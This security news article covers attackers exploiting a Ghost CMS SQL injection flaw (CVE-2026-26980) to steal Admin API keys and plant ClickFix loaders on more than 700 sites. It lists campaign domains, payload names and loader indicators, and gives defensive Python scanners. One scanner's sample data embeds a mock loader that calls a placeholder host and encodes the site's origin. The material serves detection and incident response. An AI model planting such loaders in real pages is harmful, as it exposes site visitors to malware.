Ghost CMS flaw exploited to poison more than 700 sites with ClickFix attacks
Attackers are exploiting a Ghost CMS SQL injection vulnerability to compromise websites and turn trusted pages into malware delivery traps. The campaign uses stolen Admin API keys to inject malicious JavaScript into articles, then shows visitors fake Cloudflare verification pages that push them into running harmful commands on Windows.
The campaign was detailed by Qianxin XLab, which said it identified more than 700 poisoned domains after first detecting the activity on May 7, 2026. The affected sites covered universities, AI and SaaS companies, media, fintech, security research, blockchain, and personal blogs.
The vulnerability at the center of the campaign is CVE-2026-26980, a SQL injection flaw in Ghost’s Content API. The official GitHub security advisory says Ghost versions 3.24.0 through 6.19.0 are affected and version 6.19.1 contains the fix.
How the Ghost CMS attack works
The attackers start by exploiting CVE-2026-26980 to read data from the Ghost database without authentication. Ghost stores the secret for each Admin API key (the credential behind a custom integration) in that database, so a read-only SQL injection is enough to recover it, and the key in turn lets an attacker modify posts and pages through legitimate Ghost Admin API calls.
Once the Admin API key is stolen, the attackers do not need to log into the admin panel or upload files to the server manually. They can use Ghost’s own API to rewrite article content at scale and insert malicious JavaScript at the bottom of posts.
The NVD entry for CVE-2026-26980 describes the issue as allowing unauthenticated attackers to perform arbitrary reads from the database. NVD lists Ghost versions 3.24.0 through 6.19.0 as affected and says the issue was fixed in 6.19.1.
| Item | Details |
|---|---|
| CVE | CVE-2026-26980 |
| Product | Ghost CMS |
| Component | Content API |
| Vulnerability type | SQL injection |
| Affected versions | Ghost 3.24.0 through 6.19.0 |
| Fixed version | Ghost 6.19.1 |
| Main campaign impact | Admin API key theft and mass article poisoning |
Why the stolen Admin API key matters
Ghost uses different API keys for different purposes. A Content API key is meant for reading public content, while an Admin API key can manage articles, themes, users, and other site data.
In this campaign, attackers used stolen Admin API keys to change published articles in bulk. This made the infection hard for visitors to notice because the original article content still looked normal.
A report from BleepingComputer notes that the compromised pages loaded a second-stage script and then showed visitors a fake Cloudflare-style verification prompt. The page asked users to run a command that ultimately downloaded malware.
The campaign uses ClickFix social engineering
ClickFix attacks trick users into believing they need to complete a technical step to fix a browser, CAPTCHA, or verification problem. In this case, the fake page pretends to be a Cloudflare human verification screen.
When the user clicks the fake verification step, the page copies a command to the clipboard. The user then receives instructions to press Win+R, paste the command, and press Enter. That action runs the attacker’s command locally.
Malwarebytes described the same campaign as a large ClickFix operation where trusted education and technology websites were used to push fake verification prompts that trick visitors into installing malware themselves.
- The visitor opens a legitimate but compromised Ghost-powered article.
- Injected JavaScript loads a second-stage script from attacker infrastructure.
- The script filters visitors and attempts to avoid scanners and researchers.
- Selected visitors see a fake Cloudflare verification page.
- The page instructs users to paste and run a command in Windows.
- The command downloads and runs malware on the visitor’s device.
Two threat clusters were active
Qianxin XLab said at least two different threat clusters were involved in the poisoning activity. Some domains appeared to be reinfected or overwritten by a second attacker after cleanup or after a competing script was already present.
One cluster used infrastructure such as clo4shara[.]xyz, cloud-verification[.]com, com-apps[.]cc, and web-telegram[.]ug. Another cluster used domains such as staticcloudflare[.]pro and script-dev[.]digital.
The Qianxin XLab timeline says the first round of scanning found 156 poisoned domains by May 10, 2026. By May 17, the number had grown to more than 700 affected domains.
| Attack stage | What happens |
|---|---|
| CMS takeover | Attackers exploit CVE-2026-26980 to read sensitive database content |
| API key theft | Attackers extract the Ghost Admin API key |
| Page poisoning | Articles are modified through the Ghost Admin API |
| Two-stage loading | Injected JavaScript loads additional code from attacker domains |
| ClickFix lure | Visitors see a fake verification page |
| Malware delivery | The pasted command downloads and runs a payload |
Payloads changed as the campaign evolved
The first wave used an update.zip flow that launched a Windows batch script. That script downloaded a DLL and ran it with rundll32, while opening a decoy page to distract the user.
Later activity shifted toward NotepadPlusPlus-themed payloads and an Electron-based stealer called UtilifySetup.exe. Qianxin XLab said the Electron payload used persistence and contacted web-telegram[.]ug every 30 seconds to receive instructions.
This evolution matters because the injected script on the compromised Ghost site can remain small while attackers change the payload served from their own infrastructure. Site owners may remove one visible payload but miss the loader that allows the attack chain to return.
Why trusted websites make the attack more effective
The campaign is more dangerous because users land on legitimate websites. A visitor may trust an article on a university, technology, media, or research site and assume any verification prompt is part of the browsing experience.

The social engineering step also sidesteps the warnings a browser attaches to a downloaded file, because nothing is downloaded by the browser at that point: the user carries the command into the Run box by hand, believing it completes a verification step, and the command itself fetches the payload.
Malwarebytes warned that these instructions can look harmless, using language such as proving the user is human or fixing a connection issue. That familiar framing makes the attack easier to fall for.
What Ghost site owners should check
Ghost administrators should upgrade immediately to version 6.19.1 or later. They should also assume that a simple CMS update may not remove injected article content or invalidate already stolen keys.
The official GitHub security advisory recommends reviewing staff users and rotating keys because the vulnerability can expose a site’s API keys. It also says there is no application-level workaround, although a reverse proxy or WAF can temporarily block certain suspicious Content API query patterns.
Admins should inspect article content, Code Injection settings, themes, API keys, staff accounts, and access logs. In access logs, bursts of PUT requests to the Admin API post and page endpoints (/ghost/api/admin/posts/{id}/ and /ghost/api/admin/pages/{id}/) deserve special attention, since that is how a stolen integration key rewrites existing content.
- Upgrade Ghost to 6.19.1 or a newer release.
- Rotate Admin API keys, Content API keys, administrator passwords, and sessions.
- Review staff users and remove unknown or unused accounts.
- Search posts and pages for ghost_once_footer_ and sj.ssc/ipa/.
- Search article bodies for atob( combined with appendChild.
- Check for btoa(a.origin) in injected JavaScript.
- Audit Admin API logs for unusual bulk post updates.
- Inspect Code Injection settings and theme files for added script tags.
Detection indicators for defenders
Security teams should combine CMS-side indicators with endpoint-side indicators. A poisoned Ghost article may not prove that visitors were infected, but it should trigger investigation and user notification.
On the website side, defenders should look for injected loader fingerprints and abnormal API calls. On the visitor side, teams should check whether users downloaded files from cloud-verification[.]com, com-apps[.]cc, jalwat[.]com, taketwolabs[.]com, or related infrastructure.
The BleepingComputer report also noted that attackers used the stolen Admin API key to inject JavaScript into articles, while the second-stage code filtered visitors before serving the fake Cloudflare prompt.
| Indicator type | Examples | Why it matters |
|---|---|---|
| Injected code | ghost_once_footer_, sj.ssc/ipa/, atob( with appendChild | Points to poisoned Ghost article content |
| Stage 2 domains | clo4shara[.]xyz, com-apps[.]cc, staticcloudflare[.]pro | Used to load additional scripts or campaign logic |
| Fake verification host | cloud-verification[.]com | Used for ClickFix-style social engineering |
| Payload names | installer.dll, update.bat, NotepadPlusPlus.dll, UtilifySetup.exe | Seen in payload delivery chains |
| Admin API activity | Unexpected bulk PUT requests to posts | Shows possible large-scale article tampering |
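One way to run the content-side indicators from the checklist above and from this table over a whole site at once is to scan a Ghost content export. The Python script below is an added example, not code from Ghost or from any of the cited reports. It reads the JSON file Ghost produces from the Labs export page and assumes the standard export layout, `{"db": [{"data": {"posts": [...], "settings": [...]}}]}`, with the rendered `html`, the `mobiledoc`/`lexical` editor source, and the per-post and site-wide `codeinjection_*` fields. The indicator strings are the ones quoted in the article; the embedded sample export is constructed for illustration.

```python
"""Scan a Ghost content export for the injected-loader indicators listed above.

Added example, not code from Ghost or the cited reports. Assumes the standard
Ghost export layout: {"db": [{"data": {"posts": [...], "settings": [...]}}]}.
"""
import json
import sys

# Indicator strings quoted in the article. atob( and appendChild are only
# meaningful together, so they are matched as a pair.
LOADER_MARKERS = ("ghost_once_footer_", "sj.ssc/ipa/", "btoa(a.origin)")
PAIRED_MARKERS = ("atob(", "appendChild")
CAMPAIGN_DOMAINS = (
    "clo4shara.xyz", "cloud-verification.com", "com-apps.cc", "web-telegram.ug",
    "staticcloudflare.pro", "script-dev.digital", "jalwat.com", "taketwolabs.com",
)

# Ghost keeps the rendered HTML, the editor source (mobiledoc on older posts,
# lexical on newer ones) and per-post code injection; a <script> tag can live
# in any of them. Site-wide code injection sits in the settings table.
POST_FIELDS = ("html", "mobiledoc", "lexical", "codeinjection_head", "codeinjection_foot")
SETTING_KEYS = ("codeinjection_head", "codeinjection_foot")


def find_indicators(text):
    """Return the indicator names present in one text field (empty if clean)."""
    if not text:
        return []
    hits = [m for m in LOADER_MARKERS if m in text]
    if all(p in text for p in PAIRED_MARKERS):
        hits.append("atob(+appendChild")
    normalized = text.replace("[.]", ".")  # accept defanged copies as well
    hits.extend(d for d in CAMPAIGN_DOMAINS if d in normalized)
    return hits


def scan_export(export):
    """Walk every post, page and code-injection setting; one finding per hit."""
    findings = []
    data = export["db"][0]["data"]
    for post in data.get("posts", []):
        for field in POST_FIELDS:
            for hit in find_indicators(post.get(field)):
                findings.append({"where": post.get("type", "post"), "slug": post.get("slug"),
                                 "field": field, "indicator": hit})
    for setting in data.get("settings", []):
        if setting.get("key") in SETTING_KEYS:
            for hit in find_indicators(setting.get("value")):
                findings.append({"where": "settings", "slug": None,
                                 "field": setting["key"], "indicator": hit})
    return findings


# Constructed sample export: one clean post, one poisoned post carrying a
# footer loader, and a site-wide code injection pointing at a campaign domain.
# The base64 string decodes to https://example.invalid and is a placeholder.
SAMPLE_EXPORT = {"db": [{"data": {
    "posts": [
        {"slug": "welcome", "type": "post", "html": "<p>Hello</p>", "lexical": "{}"},
        {"slug": "research-note", "type": "post",
         "html": ('<p>Real article text.</p><script id="ghost_once_footer_1">'
                  'var a=document,s=a.createElement("script");'
                  's.src=atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=")+"/?o="+btoa(a.origin);'
                  'a.body.appendChild(s)</script>')},
    ],
    "settings": [
        {"key": "title", "value": "Example blog"},
        {"key": "codeinjection_foot",
         "value": '<script src="https://staticcloudflare[.]pro/check.js"></script>'},
    ],
}}]}


if __name__ == "__main__":
    # Usage: python scan_ghost_export.py my-site.ghost.2026-05-18.json
    export = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_EXPORT
    for f in scan_export(export):
        print(f"{f['where']}:{f['slug'] or '-'} [{f['field']}] -> {f['indicator']}")
```

Run it against a fresh export taken before cleanup, so the poisoned state is preserved for forensic review. A clean scan of the export does not clear theme files, which Ghost does not include in the content export; those still need a separate grep for added script tags.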
Why patching alone may not be enough
Installing the fixed Ghost version closes the known SQL injection path, but it does not automatically clean poisoned articles or revoke secrets that attackers already stole. Site owners need to treat vulnerable, exposed Ghost installations as possible compromises.
That means rotating credentials, cleaning content at the database level, reviewing logs, and checking for reinfection. Some sites may have been targeted by more than one actor, so cleaning only one injected script may leave another behind.
The NVD record confirms the affected version range and the fixed version, but operational recovery requires more than version validation. Administrators need to verify that site content, API keys, and access logs no longer show attacker activity.
- Take a backup for forensic review before cleaning.
- Upgrade Ghost to 6.19.1 or later.
- Rotate API keys, passwords, and active sessions.
- Export or query article content for injected script patterns.
- Remove malicious JavaScript from posts, pages, themes, and code injection settings.
- Review at least 30 days of Admin API calls where available.
- Notify visitors if the site served ClickFix lures during the compromise window.
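Reviewing Admin API activity, as the checklist above asks, means looking for a client that rewrote many posts in a short window. The Python script below is an added example, not code from Ghost or from the cited reports. It assumes the reverse proxy in front of Ghost writes an Nginx or Apache combined-format access log and that update requests follow the Ghost 5/6 route pattern PUT /ghost/api/admin/posts/<24-hex id>/ (older releases put an API version in the path, which the pattern also accepts). The window and threshold are assumptions to tune per site, and the sample log lines are constructed.

```python
"""Flag bursts of PUT requests to the Ghost Admin API posts/pages endpoints in
a web-server access log.

Added example, not code from Ghost or the cited reports. Assumes a combined
format access log and the Ghost 5/6 Admin API route layout.
"""
import re
import sys
from collections import defaultdict
from datetime import datetime, timedelta

# Nginx/Apache "combined" log format (assumed; adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Update route for posts and pages; Ghost resource ids are 24 hex characters.
ADMIN_EDIT_RE = re.compile(
    r"^/ghost/api/(?:v\d+/)?admin/(?:posts|pages)/(?P<id>[0-9a-f]{24})/?(?:\?|$)"
)


def parse_line(line):
    """Parse one access-log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    edit = ADMIN_EDIT_RE.match(rec["path"]) if rec["method"] == "PUT" else None
    rec["post_id"] = edit.group("id") if edit else None
    return rec


def find_bulk_updates(lines, window=timedelta(minutes=5), threshold=10):
    """Return one alert per client IP whose successful post/page edits reach
    `threshold` inside any `window`-long span. Thresholds are assumptions."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["post_id"] and rec["status"] == "200":
            per_ip[rec["ip"]].append(rec)
    alerts = []
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = 0, 0
        for end in range(len(recs)):  # sliding window over sorted timestamps
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({
                "ip": ip,
                "count": best,  # edits in the densest window
                "distinct_posts": len({r["post_id"] for r in recs}),
                "user_agents": sorted({r["ua"] for r in recs}),
                "first": recs[0]["ts"].isoformat(),
                "last": recs[-1]["ts"].isoformat(),
            })
    return alerts


def sample_log():
    """Constructed log: one editor save, then a scripted client rewriting 12
    posts in under two minutes, plus the listing call that preceded it."""
    lines = ['198.51.100.4 - - [09/May/2026:02:58:11 +0000] "PUT /ghost/api/admin/posts/'
             '64f1a2b3c4d5e6f708192a3b/ HTTP/1.1" 200 8112 "https://blog.example/ghost/" "Mozilla/5.0"',
             '203.0.113.7 - - [09/May/2026:03:13:59 +0000] "GET /ghost/api/admin/posts/?limit=all '
             'HTTP/1.1" 200 90231 "-" "python-requests/2.31"']
    base = datetime(2026, 5, 9, 3, 14, 7)
    for i in range(12):
        ts = (base + timedelta(seconds=9 * i)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        lines.append(f'203.0.113.7 - - [{ts}] "PUT /ghost/api/admin/posts/{i:024x}/ HTTP/1.1" '
                     f'200 7100 "-" "python-requests/2.31"')
    return lines


if __name__ == "__main__":
    # Usage: python ghost_bulk_put.py /var/log/nginx/access.log
    source = open(sys.argv[1]) if len(sys.argv) > 1 else sample_log()
    for a in find_bulk_updates(source):
        print(f"{a['ip']}: {a['count']} edits in window, {a['distinct_posts']} posts, "
              f"{a['first']}..{a['last']}, UA={a['user_agents']}")
```

The Ghost admin editor autosaves through the same PUT route, so a human writer can trip the threshold too; the user agent and referer on the alert separate a browser session from a scripted client, and a listing call such as GET /ghost/api/admin/posts/?limit=all right before the burst is the other tell.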
Advice for visitors who saw a fake verification page
Visitors should treat any page that asks them to press Win+R, paste a command, and press Enter as malicious. Real CAPTCHA or Cloudflare verification checks do not require users to run commands on their computer.
If a user followed the instructions, they should disconnect the device from the network, run a full security scan, review downloaded files, check startup items, and change important passwords from a separate trusted device.
Users should also check browser downloads for update.zip, NotepadPlusPlus.zip, installer.dll, update.bat, NotepadPlusPlus.dll, and UtilifySetup.exe. Any interaction with those files should trigger a security review.
Bottom line
The Ghost CMS campaign shows how a CMS vulnerability can turn trusted websites into malware delivery infrastructure. Attackers used CVE-2026-26980 to steal Admin API keys, poison article content, and push ClickFix attacks at visitors.
Ghost administrators should update immediately, rotate credentials, inspect content for injected JavaScript, and audit Admin API activity. Visitors should never run commands copied from a fake verification page.
The strongest response combines patching, cleanup, credential rotation, log review, and user notification. Without those steps, a patched Ghost site may still contain poisoned content or exposed keys from the earlier compromise.
FAQ
CVE-2026-26980 is a SQL injection vulnerability in Ghost CMS’s Content API. It affects Ghost versions 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary database content.
Ghost 6.19.1 fixes CVE-2026-26980. Site owners should upgrade to 6.19.1 or a newer release and then rotate keys and clean any injected content.
Attackers exploited the SQL injection flaw to read the database and steal Admin API keys. They then used those keys to modify articles in bulk and inject malicious JavaScript loaders at the bottom of pages.
ClickFix is the social engineering method used after visitors land on poisoned pages. The fake verification page tells users to run a command on Windows, which downloads and executes malware.
Admins should upgrade Ghost, rotate Admin API keys and passwords, clean injected scripts from articles and themes, review Code Injection settings, audit Admin API logs, and notify users if malicious pages were served.